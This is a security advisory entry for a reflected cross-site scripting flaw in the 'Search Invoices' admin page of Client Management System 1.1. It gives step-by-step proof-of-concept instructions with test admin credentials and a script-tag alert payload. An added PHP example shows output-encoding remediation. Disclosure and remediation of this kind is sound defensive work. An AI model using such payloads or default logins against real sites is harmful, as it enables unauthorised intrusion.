Client Management System 1.1 - Reflected Cross Site Scripting (XSS) in 'Search Invoices' on admin panel

CVE: N/A
Category: CWE-79
Price: N/A
Severity: Medium
Author: N/A
Risk: Medium
Exploitation Type: Remote
Date: 2021-06-15
CPE: Not provided for this exploit
CVSS: CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
EPSS: 0.02192
EPSSP: 0.36857

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021060093

Below is a copy:

# Exploit Title: Client Management System 1.1 - Reflected Cross Site Scripting (XSS) in 'Search Invoices' on admin panel
# Date: 14 June 2021
# Exploit Author: BHAVESH KAUL
# Author Linkedin: https://www.linkedin.com/in/bhavesh-kaul-cs/
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/client-management-system-using-php-mysql/
# Version: 1.1
# Tested on: Server: XAMPP

# Description #

Client Management System 1.1 is vulnerable to reflected cross-site scripting because user-supplied data is not sufficiently sanitized.

# Proof of Concept (PoC) : Exploit #

1) Go to: http://localhost/clientms/admin/index.php
2) Log in as admin using test credentials: admin/Test@123
3) Go to: http://localhost/clientms/admin/search-invoices.php
4) Enter the following payload in the user name field: <script>alert(1)</script>
5) Click on Search
6) The payload fires and an alert box pops up
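
The remedy for this class of bug is to encode the search term for the HTML context at the point where it is written back into the results page. The following is an added example, not the application's source and not code from the advisory author; the field name `search_term` and all function names are hypothetical.

```php
<?php
// Added illustration; NOT the source of search-invoices.php.
// The field name 'search_term' and every function name here are hypothetical.

// Vulnerable pattern: the submitted value is concatenated into HTML unchanged,
// so any markup in it is parsed by the browser as part of the page.
function render_heading_unsafe(string $term): string
{
    return '<h4>Results for "' . $term . '"</h4>';
}

// One encoder for HTML text and quoted-attribute contexts.
// ENT_QUOTES covers both quote styles; ENT_SUBSTITUTE replaces invalid UTF-8
// with U+FFFD instead of returning an empty string.
function html_encode(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened pattern: encode at output time, in the element body...
function render_heading_safe(string $term): string
{
    return '<h4>Results for "' . html_encode($term) . '"</h4>';
}

// ...and when the term is echoed back into the search box (attribute context).
function render_input_safe(string $term): string
{
    return '<input type="text" name="search_term" value="' . html_encode($term) . '">';
}

// Constructed sample inputs: the advisory's test string and a benign value
// containing characters that are significant in HTML.
$samples = ['<script>alert(1)</script>', 'O\'Brien & Sons "Ltd"'];

foreach ($samples as $term) {
    $safe = render_heading_safe($term) . render_input_safe($term);
    // Regression check: only the three tags the template itself emits
    // (<h4>, </h4>, <input>) may appear; input must never add a raw '<'.
    if (substr_count($safe, '<') !== 3) {
        throw new RuntimeException('unencoded markup reached the output');
    }
    echo 'unsafe: ', render_heading_unsafe($term), PHP_EOL;
    echo 'safe:   ', $safe, PHP_EOL;
}
```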
